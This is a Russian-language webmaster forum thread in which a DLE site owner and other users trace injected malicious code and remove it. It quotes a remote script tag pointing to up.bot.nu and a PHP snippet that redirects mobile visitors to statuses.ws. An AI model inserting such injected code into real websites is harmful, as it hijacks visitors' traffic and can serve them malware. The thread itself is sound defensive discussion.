Вирус в dle сайте

david90 david90  
1
  12.05.2013 21:01       1 464     Помощь  
Здравствуйте. Недавно заметил что Яндекс нашел в Dle сайте вирус. Порылся в исходном коде, нашел подозрительную строку в 

<head>
<script type="text/javascript" src="http://up.bot.nu/go/260"></script>
 </head>

Что это может быть за вирус, может кто сталкивался с таким, в каких файлах стоит искать? Спасибо.

Ответы на пост (18) Написать ответ
killerben killerben
73
12.05.2013 21:04
у меня на WP постоянно такое появляется, я уже не знаю что делать (у меня как попандер предлагающий обновить абоде ридер.)
0
david90 david90
1
12.05.2013 21:06
Да, сам думаю удалить эту строку. Но не знаю, надо разобраться откуда она появляеться.
0
worldos worldos
16
12.05.2013 21:20
Скорее всего у вас шелл на сайте, могу помочь его найти
0
dan95 dan95
63
12.05.2013 21:22
Эта строчка выводится тегом {headers} в main.tpl, {headers} изменять нужно в /engine/engine.php в самом низу.
0
dgekki dgekki
2
12.05.2013 21:24
За частую бывает,если шаблон взят с паблика он в любом случаи напичкан рекламой!
А если стоит нуль от M.I.D то воопще лучше сразу сайт удалить,я как то раз поковырялся в нем у меня чуть челесть не отпала,он как дуршлак напичкан!
0
kanzashi kanzashi
114
12.05.2013 21:37
напичкан чем? нулы от мид тим самые надежные, за 3 года работы, ни одного "косяка". прежде, чем обвинять, подумайте, сможете ли доказать...
в общем пруф в студию.
dan95, дело пишет...
0
74ivan74 74ivan74
499
12.05.2013 21:39
david90 david90
1
12.05.2013 21:40
Вообщем в engine.php множество стороннего кода, но раньше не было.
0
david90 david90
1
12.05.2013 21:43
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}$active = FALSE;
$newsmodule = FALSE;
$disable_index = FALSE;
Кто может сказать, что делать с этим кодом, удалить?
0
74ivan74 74ivan74
499
12.05.2013 21:44
удалить, трафик сливается
0
74ivan74 74ivan74
499
12.05.2013 21:45
config.php проверьте и index.php
0
74ivan74 74ivan74
499
12.05.2013 21:45
Вы пользуетесь стандартное, dle проверкой? попробуйте!
0
david90 david90
1
12.05.2013 21:46
Спасибо 74ivan74
0
david90 david90
1
12.05.2013 22:03
Антивирус Dle обнаружил папку /upgrade/ и файлы внутри нее. Может удалить эту папку?
0
kanzashi kanzashi
114
12.05.2013 22:19
удалить конечно... она необходима для обновления версии (это когда обновляешься до актуальной версии движка, заливаешь ее)
0
milko milko
289
12.05.2013 22:42
у меня тоже уж 2 года как дле стоит от мид. первый косяк был месяца два назад, тоже яша писал, что есть вирус. я не нашла. яша тоже повторно не нашел. а вот потом стала перевозить сайты и нашла. прям в конфиге было все прописано, с телефонов, айфонов и прочего шло перенаправление. но вот с моего смарта ни разу не было его. лично я выставила права 644 на конфиг и закрыла регу. потом искала информацию и нашла, что нынче можно так подосрать (пардон) через загрузку аватара. больше ходов не нашла. да и закрыли уже в новых версиях эту дыру.
0
Donatsavkin Donatsavkin
229
12.05.2013 23:00
код нужно удалять...
0
dgekki dgekki
2
13.05.2013 00:14
Стоит нулл от мид? Лезим в файлы engine.php ищем ссылку на 8дле . ру дальше ползем в show.full.php ищем тот же самый адрес, далее идем feedback.php ищем ссылку на невтемплеатес . ру ,по мимо этой ссылки там имеется еще парочка левых,удаляюсь с темы... ps - про шаблоны вообще молчу, описал малость!
0